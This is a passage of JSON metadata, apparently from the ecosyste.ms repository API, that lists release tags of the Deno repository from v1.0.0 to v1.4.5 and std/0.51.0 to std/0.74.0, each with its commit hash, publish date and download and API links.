eno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit